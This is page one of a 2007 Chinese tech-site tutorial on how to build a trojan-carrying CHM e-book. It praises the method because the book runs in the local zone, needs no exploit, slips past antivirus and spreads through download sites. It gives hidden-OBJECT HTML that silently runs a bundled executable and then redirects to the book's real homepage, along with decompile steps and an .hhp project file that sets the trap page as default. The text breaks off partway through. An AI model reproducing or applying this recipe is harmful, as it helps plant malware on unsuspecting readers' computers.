文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院操作系统 木马病毒详解电子书(CHM)木马病毒
精品推荐
特别推荐
·趋势:新反病毒技术亟待成熟
·病毒反抗杀毒软件主要手段
·文件关联型木马的特殊化查杀
·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集
·识别非法进程及手工杀毒技巧
·清除系统隐藏病毒文件全攻略
·轻松找到恶意网站中藏的病毒
·一个防止U盘病毒的小技巧
·AUTO病毒致杀软失效并下载病毒
·禁止让瑞星2008随机启动的绝招
·通过客户端上网流程发现是否挂马
·不是这么简单 揭秘网友十大杀毒误区
·江民病毒播报:小心针对QQ的木马病毒
·注意!明星激情照被黑客利用传毒
·AUTO病毒破坏杀软下载恶意程序
·防止木马的入侵 木马清除方法大萃集
·精心设置卡巴斯基 彻底加快杀毒速度
·资深网管浅谈ARP欺骗类病毒的防治思路
·不再怕电脑病毒 电脑中毒后的6招处理方法
·如何让你的U盘做到100%预防电脑病毒
热点TOP10
·卡巴斯基6.0下载卡巴斯基6.0key激活码
·卡巴斯基2009 Beta版 初步试用感受
·卡巴斯基杀毒软件优化设置指南
·不再怕电脑病毒 电脑中毒后的6招处理方法
·诺顿杀毒软件正式版用户找回密码的方法
·卡巴斯基Kaspersky 6.0半年免费激活码
·卡巴斯基提供升级包 解决病毒库升级
·一个防止U盘病毒的小技巧
·8749恶意篡改主页 360安全卫士出专杀
·轻松找到恶意网站中藏的病毒
·江民杀毒软件 KV2008 正式版免费下载
·手工完全卸载Norton Antivirus
·警惕!武藤兰背后,隐藏着危机!
·BitDefender杀软免费送一年注册码
·常见病毒的症状、专杀工具
·清除系统隐藏病毒文件全攻略
·如何能够快速检测定位出局域网中的ARP病毒电脑?
·百款杀毒软件测试:病毒样本的处理过程
·防止木马的入侵 木马清除方法大萃集
·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集

详解电子书(CHM)木马病毒

日期:2007年9月3日 作者: 查看:[大字体 中字体 小字体]


  电子书木马(以下所指的电子书均指CHM格式的电子书)?其实这种方式的木马传播方法很早就有出现,但好象是多以网页木马的形式存在的,也就是把所谓的一个网页木马加入电子书里,这种效果和一般的网页木马的效果一样受到漏洞范围的限制,因此一直没引起人们的太大关注,也许大家觉得这样还不如直接的网页木马来得方便,其实不然,因为电子书相对与网页而言有许多“优点”,当然这里所谓的“优点”是指在传播木马方面而言的!
 
  相关推荐:特络伊木马查杀专区、

  在正式打造我们的电子书木马前,我们先分析一下它的“优点”吧!

  一:因为电子书一般是在本地电脑域打开的,因此它所获得的权限也是本地电脑域的权限,所以比起网页木马的Internet域来,让木马获得执行的机会要简单的多,“不必使用漏洞”就可以执行,从而也就不会被杀毒软件查杀,如果你的木马程序够好的话!也不必担心别人打了漏洞补丁!(Windows 2003除外,原因下面会说到);

  二:现在的网页木马由于影响力太大,一般的人上网都会小心三分提防的,且它依赖与漏洞,所以生存的空间正在逐渐缩小,与此相反的是电子书的火爆下载,使得电子书木马的传播能力以及范围大大加强!

  三:由于木马程序嵌入电子书里,一般的杀毒软件无法对其中存在的木马病毒等破坏性程序进行检查和清除,至少我还没发现有哪个软件可以做到这点,而且如果对这类电子书进行检查,杀毒所需时间也会过长!

  四:还有最后一点就是,网页木马一般都要自己辛辛苦苦的去传播,并且站点随时可能被关闭,而咱的电子书却可以让许多大的下载站点为咱做点贡献!获得长久时间的传播,当然前提是这本电子书够精彩!

  好啦!下面就让我带大家一步步打造个超级隐蔽的电子书木马吧!

  首先准备好工具如下:

  1:Microsoft HTML Help Workshop V1.32
    电子书制作工具,由微软公司出的编程配套软件,可以帮助您建立 HTML 格式的帮助文件!当然也可以用Quick CHM等其他CHM格式的电子书制作工具;
  2:超级木马一只(也就是一个你觉得最好的木马程序一个而已,相信大家比我熟悉),本文演示用“Window 按钮突破专家”这个小软件”;
  3:现在最火爆的电子书籍(大哥们,不要拿咱们菜鸟的电脑教材开刀呀!)若干,当然如果你有能力自己做我也不反对,本文演示用Windows 2000的帮助文档WINNT\Help下的access.chm开刀!

  准备好了吗?开始制作吧!

  第一步:

  打开access.chm,在右侧的空白处,点击右键菜单,选择属性,出现对话框:

  我们可以知道这个电子文档的默认主页是:accessibility_overview.htm,标题栏文字是:辅助选项

  第二步:

  制作一个可以让木马运行并且同时可以自动转到原电子书的默认主页的网页icyfox.htm,代码如下:

<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='accessibility_overview.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="Window 按钮突破专家.exe">
</OBJECT>
</BODY>
</HTML>

  说明:把其中的accessibility_overview.htm改为你用的电子书的默认主页名,把“Window 按钮突破专家.exe”改为你的木马程序名!

  另外,如果你的木马程序体积比较大,请相应的把上面的转向时间3改的值大一点!

  在Windows 2003中默认在本地电脑域中好像并不允许OBJECT标签运行本地程序(我自己没装Windows 2003),所以不适合在Win2003使用!当然我们可以在代码中加入判断是否是Windows 2003的语句,来隐藏自己的木马!用navigator.appVersion属性判断!

  第三步:

  打开HTML Help Workshop,选择File菜单下的Decompile...项,对access.chm进行反编译。

  编译后的目录“G:\CHM木马”中可以看到access.hhc(对应帮助文档左侧的“目录”项)和access.hhk(对应帮助文档左侧的“索引”项);

  第四步:

  建立一个新的带有木马的电子书;

  把“Window 按钮突破专家.exe”,也就是你的木马程序复制到反编译后的目录“G:\CHM木马”中,并在此目录下建立一个icyfox.hhp的文件(用记事本即可!),内容如下(注意;号后面的注释不要写上):

[OPTIONS]
Compatibility=1.1 Or later
Compiled file=access.chm ;把access.chm改为你要生成的电子书名
Default Window=Main
Language=0x804 中文(中国)

[WINDOWS]
Main="辅助选项","access.hhc","access.hhk","icyfox.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0

[1] [2] 下一页 




上一篇:企业网站赢利模式的思考

下一篇:两秒搜到文件?Widnows vista极速搜索原理揭秘

详解电子书(CHM)木马病毒 相关文章:
·BIOS详解
·电子书籍下载大放送
·图文详解 Windows 2003服务器集群安装
·不用任何软件(木马程序)盗取账号密码
·基础知识 初级黑客安全技术命令详解
·Linux常用命令详解
·QQ木马到底怎么做 QQ挂马方法大揭密
·Windows2000/XP启动过程详解
·局域网文件共享详解
·详解:五种Windows常用密码设置
详解电子书(CHM)木马病毒 相关软件:
·孙鑫VC++从入门到精通开发详解视频教程FLASH版
·eREAD电子书阅读器v6.0 Version 20080201
·余世维《成功经理人讲座》完整电子书
·AutoCAD 2007傻瓜手册电子书
·二十四部古文学电子书合集
·fdisk分区详解电子书教程
·性保健和性疾病CHM电子书
·中国网管论坛精华电子书
·硬盘分区与格式化详解
·AutoCAD2002入门与实例详解

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot